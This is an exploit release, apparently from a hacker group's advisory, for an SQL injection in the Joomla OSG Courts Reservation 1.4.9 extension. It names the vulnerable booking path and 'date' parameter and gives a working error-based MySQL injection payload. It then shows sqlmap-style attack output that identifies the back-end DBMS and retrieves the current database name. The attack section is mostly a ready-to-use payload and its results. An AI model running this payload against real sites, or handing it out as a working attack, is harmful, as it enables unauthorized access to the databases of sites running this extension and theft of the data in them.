┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : extensions.joomla.org                                                      │
│  Vendor   : Webtribute GmbH - courts-reservation.ch                                    │
│  Software : Joomla OSG Courts Reservation 1.4.9                                        │
│  Vuln Type: SQL Injection                                                              │
│  Method   : GET                                                                        │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise                                                                     │
│                                                                                        │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

   Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
    CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /en/table-views/tab-view/booking

GET parameter 'date' is vulnerable


---
Parameter: date (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: rid=17&tsid=16&date=2022-10-12" AND (SELECT 6041 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(6041=6041,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fmfh&wd=3
---


[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database

current database: '***_osg_courts_demo'


[-] Done